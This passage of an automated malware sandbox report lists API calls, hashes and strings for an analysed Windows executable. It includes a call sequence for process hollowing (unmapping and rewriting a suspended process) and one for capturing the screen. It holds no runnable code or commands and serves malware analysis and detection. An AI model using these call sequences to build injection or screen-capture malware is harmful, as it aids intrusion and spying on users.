                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
                                • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                                • Opcode Fuzzy Hash: 4f9fc82b5c10d6610e5ed6531d98e333281f4b2b56e24c5c8b0cdbea65e89b46
                                • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                                • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                                • Instruction Fuzzy Hash:
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                • Instruction ID: 723622f834e47c23106d271d0d88d1dc321cab027353f38a50b8b0e2426ac40f
                                • Opcode Fuzzy Hash: 5939193a035a9f71e1be9e8e65b71e813b2798266dd155f684168ca2d02e33de
                                • Instruction Fuzzy Hash: D4518BB1E0864457DF38A9A976557BFA7899B4D304F18391FD882D7382C60CED06C31E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction ID: 6198f9fd5856e2fadc0eee1ef7bf8112c6a5ea678d4112deff0a08df7cd0a8a1
                                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                • Instruction Fuzzy Hash: 83410975A187458BC344CF29C58061BFBE1FFD8314F645A1EF889A3350D7B9E9828B86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
                                • Instruction ID: ac95e4143a92ff0618d82a399ec7b133dd136baee215df138bf5792b33e3284f
                                • Opcode Fuzzy Hash: 7f53e293dee35998a8249f38609762a9e2a15299405adcda504afdded652bb6e
                                • Instruction Fuzzy Hash: 7B322621D29F414DE7239A35C872336A24CEFB73C9F15D737E81AB5AA6EB28C4834144
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: adfe1dba00841067e185db543baddc51ec719100166669f3b49a19c95eafed37
                                • Instruction ID: ddb96738fd74990a51aa4d57cd7ecd2d3edd4d3efe0166ecbb7dd1f918ebfc19
                                • Opcode Fuzzy Hash: adfe1dba00841067e185db543baddc51ec719100166669f3b49a19c95eafed37
                                • Instruction Fuzzy Hash: F832C6B1A087459BC719DF28C8807ABB7E1BF85318F04462EF89587381D778DD85CB8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 199ba30b8d3b8772c08d07e40edcb85330ea6891d98c7dc88682a917a24b3e4f
                                • Instruction ID: 5c6380b7442203eb09b5b6243dbf6f2b0d892e6a2da6515435673998fb66d49f
                                • Opcode Fuzzy Hash: 199ba30b8d3b8772c08d07e40edcb85330ea6891d98c7dc88682a917a24b3e4f
                                • Instruction Fuzzy Hash: C602A471714A528FC758CF2EEC4063AB7E1AB8E306B85453EE495C7781EB34E921CB94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
                                • Instruction ID: 9832893ecb8716a8230fb1444da9bced5d75184ca3800c066fd9b1088accf213
                                • Opcode Fuzzy Hash: 9ad16798d89cc847e280ebfd23893692ba583267ff92785f21bf8c1a35f6125b
                                • Instruction Fuzzy Hash: CEF181356246558FC304DF1DE89192BB3E1FB89306F85092EF182C7391DB78E925CB9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction ID: 656262e35da032ffd0a077b83a64e39d55d78725ba1fa3deec4bc033c2bd9230
                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                • Instruction Fuzzy Hash: 21C1C1322059930ADF2D4639853503FFBE15AA67B171A2B6FD4B7CB2C4FE28C524D624
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction ID: 83a77ad86d3d882556a1d1f8a871d3d99dabfb51986f73d2778cf32764f6a177
                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                • Instruction Fuzzy Hash: 7FC1E3322055930ADF2D8639C53103FBBE15AA67B171B676FD4B6CB2C4FE28C524D624
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction ID: 2e2fcf76ea68e3d1ce03a604506cc299a951e5de5e734e711f809c72e20f7287
                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                • Instruction Fuzzy Hash: 12C1C2322059934ADF2D4639857103FBBE15EA67B1B1A276FD4B7CB2C0FE28C524D624
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction ID: cc9b1a5688ee457b4940033b23912546db57db7e3d6d8e70cc9d87b8c0cd44da
                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                • Instruction Fuzzy Hash: 25C1F6322059930ADF2D463AC53113FBBE15AA57B171A276FD8B7CB2C4FE28C524C614
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a4acb0c57b36eb3415ac6b495fb2fe374479695d9aeff5f562a86b8f44aae54b
                                • Instruction ID: d47e39d1b20c68f472f2cbcbc0b1e5e76a9f7a6e19272067298aabf3f738eb94
                                • Opcode Fuzzy Hash: a4acb0c57b36eb3415ac6b495fb2fe374479695d9aeff5f562a86b8f44aae54b
                                • Instruction Fuzzy Hash: E1B184791142998ACB05EF68C4913F63BA1EF6A300F0850B9EC9CCF757E3398506EB64
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                • Instruction ID: ae92f65c41008aac329c7d646b8d99fb38e08d933e524e45c1d49ddbea67f2dd
                                • Opcode Fuzzy Hash: a25cfcba4cb24fdf0fe01b1cfb0217293a2d97f1f2c5caf2e195f2ab18ef9283
                                • Instruction Fuzzy Hash: 36616671E00B0866DA389A2968927BF2795DB2D708F14392FF483DF3C1C66D9D42C65E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                • Instruction ID: 66342361016897109e24a26c448f772de671845df11bd1e198e526645aade2d2
                                • Opcode Fuzzy Hash: 2c66de2964dbf7c0103d26a637bb9c3df90e686996b70b361c2c57e4183adb73
                                • Instruction Fuzzy Hash: CD518970E10A0556DB394969B9957BF379A9F1E304F18380FE842DB382C28CDD06D35E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 716b1dae2f0c2af9dbf7ff04b076b7452853e6ae29ff5b9cb42b3bd13e1c206f
                                • Instruction ID: 6d2995492066a9b16b195f6531796c1ccffa7af2014367dacfc1c2128089f42d
                                • Opcode Fuzzy Hash: 716b1dae2f0c2af9dbf7ff04b076b7452853e6ae29ff5b9cb42b3bd13e1c206f
                                • Instruction Fuzzy Hash: 49617F326083049FC304DF75E482A5FB7E4AFCC718F450E2EF49996251E774EA088B86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction ID: 3c347dad04b4a8ced02cdc3a1d1f73fe72ec142e803a1f09a224371d112cc28a
                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                • Instruction Fuzzy Hash: E811297720104373E6158A2DF4B86B7A7A5EACD320F2FE377C0424B75CC12AD5559508
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                  • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                • DeleteDC.GDI32(00000000), ref: 00416F32
                                • DeleteDC.GDI32(00000000), ref: 00416F35
                                • DeleteObject.GDI32(00000000), ref: 00416F38
                                • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                • DeleteDC.GDI32(00000000), ref: 00416F6A
                                • DeleteDC.GDI32(00000000), ref: 00416F6D
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                • GetCursorInfo.USER32(?), ref: 00416FAF
                                • GetIconInfo.USER32(?,?), ref: 00416FC5
                                • DeleteObject.GDI32(?), ref: 00416FF4
                                • DeleteObject.GDI32(?), ref: 00417001
                                • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                • DeleteDC.GDI32(?), ref: 0041713C
                                • DeleteDC.GDI32(00000000), ref: 0041713F
                                • DeleteObject.GDI32(00000000), ref: 00417142
                                • GlobalFree.KERNEL32(?), ref: 0041714D
                                • DeleteObject.GDI32(00000000), ref: 00417201
                                • GlobalFree.KERNEL32(?), ref: 00417208
                                • DeleteDC.GDI32(?), ref: 00417218
                                • DeleteDC.GDI32(00000000), ref: 00417223
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                • Opcode ID: 1c8eb6970acb32d37b323b2389c2378745184ce0039c4fbe48c904cadf28dbca
                                • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                • Opcode Fuzzy Hash: 1c8eb6970acb32d37b323b2389c2378745184ce0039c4fbe48c904cadf28dbca
                                • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                                • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                                • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                                • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                                • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                • ResumeThread.KERNEL32(?), ref: 00416773
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                                • GetCurrentProcess.KERNEL32(?), ref: 00416795
                                • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                                • GetLastError.KERNEL32 ref: 004167B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: 2be8fea86c719762713c8bf7b548c83654da6953c44db828118e2ba3fc6e7782
                                • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                • Opcode Fuzzy Hash: 2be8fea86c719762713c8bf7b548c83654da6953c44db828118e2ba3fc6e7782
                                • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,?,0040C3C8), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF,?,0040C3C8), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C0D6
